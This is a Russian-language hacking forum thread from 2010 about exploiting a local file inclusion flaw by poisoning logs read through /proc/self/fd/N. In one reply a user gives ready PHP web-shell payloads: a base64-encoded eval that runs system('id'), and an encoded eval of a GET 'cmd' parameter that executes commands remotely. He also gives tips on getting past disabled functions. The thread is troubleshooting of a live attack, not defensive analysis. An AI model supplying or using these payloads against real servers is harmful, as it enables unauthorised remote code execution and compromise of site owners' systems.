LFI + /proc/self/fd/N

Discussion in 'Уязвимости' started by _Pantera_, 16 Jul 2010.

  1. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    187
    Likes Received:
    356
    Reputations:
    109
    Дело имею с виртуальной файловой системой /proc. Казалось бы все классно и я нашел файл где хранятся логи "/proc/self/fd/N".
    Но тут наступает неприятный момент: Я отправляю пакет с подменой "Referer" на
    и...... инклудить логи после этого не получается. Как будто /proc/self/fd/N умирает. Кто сталкивался, как бороться с этим?
     
  2. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    758
    Likes Received:
    1,053
    Reputations:
    291
    Что значит умирает? Какая ошибка? Может отключен шорттаг и ты просто запорол еррорм лог?
     
    3 people like this.
  3. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,007
    Likes Received:
    996
    Reputations:
    155
    К /proc/self/environ доступ есть?
     
    1 person likes this.
  4. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    958
    Likes Received:
    527
    Reputations:
    204
    1. Запорол лог: ошибка в синтаксисе PHP.
    2. Кавычки убили все, попробуй <?php eval(base64_decode([zzz])); ?> - zzz = system('id') в бейс64.

    Ищи другой лог и попробуй сразу <?php eval(base64_decode(c3RyaXBzbGFzaGVzKCRfR0VUW2NtZF0p)); ?> = <?php eval(stripslashes($_GET[cmd])); ?>

    system и прочая ересь может быть отключена... т.ч. попробуй просто <?php echo('qwe'); ?>
     
    1 person likes this.
  5. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    187
    Likes Received:
    356
    Reputations:
    109
    Всем спасибо. Вероятнее всего ошибку вызывает шорттаг
     
Loading...
Similar Threads - proc self
  1. cr0w
    Replies:
    5
    Views:
    2,085